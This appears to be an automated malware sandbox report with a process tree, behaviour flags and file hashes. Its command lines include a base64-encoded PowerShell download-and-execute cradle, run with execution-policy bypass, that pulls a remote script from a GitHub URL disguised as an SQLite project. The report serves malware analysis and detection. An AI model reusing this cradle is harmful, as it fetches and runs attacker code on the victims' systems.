C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2764
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:4048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2784
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
2135523d8dd706c2d09532757d25afab
SHA1a607f4a783bdade3f368cca7d59be5335cda1f6e
SHA2560cb3f592b4fa554308ccd67ce96398f120dd3a282970b87f8dc76e3b53cfd2dd
SHA512d77e2b8176d43faf312f04c853f7c1038fb1603cd18b4fabe32d7f3c814377b26aed3f917fd2ba504a9c53241628ea20a37c71463173f81301fa2e9331f72db0
-
MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
MD5
1a1a6f9278ab3440b1f7bcb49a3ff0c9
SHA18b1a17ddcdc428b2c4d299541d5c80d510aa8beb
SHA2561c80cb0511df2a108979f3c5fedc0c882577fec56a532f5c9a70307571d51b71
SHA51230235ec857a97826dce1ec7b54d771bfcb8f929ece6e878108fe4187613b397c41cd93305a974381ddcb74009d556e9b6175649556ab2405dd095cee143f3bd2
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
c6882d198bb135163da004a7e79683c5
SHA19959cd6bff3377b594dac91654e495a9221390cd
SHA256be53f3fb7c151a4712a35d6bc74ea74478803b57db15405ee50619556e5140c9
SHA512442b07ea9d60f32ce6c965fa7105607f31f7aba301bc688a5e966cbd004d4c454c714aef12a558522c91db28af458fa770d1ee05f3632b899670095ba89b18dd
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
8f57245afafb634413db5814afb49e32
SHA1227c596341d466a5787d1396d5c29daecaaec1b2
SHA256ca641741f1c2a499b56d64b7c64dfadf47758518df9b2a81e686f0c80e4567f0
SHA51208ae3faadde477e7cb6b5149136e95379697db17ee1f2b646abeaaf8460eba309ed764318025c276fd60eca14934210bb3f9bf63bec0d82c8582bd959c4661fa
-
MD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
MD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13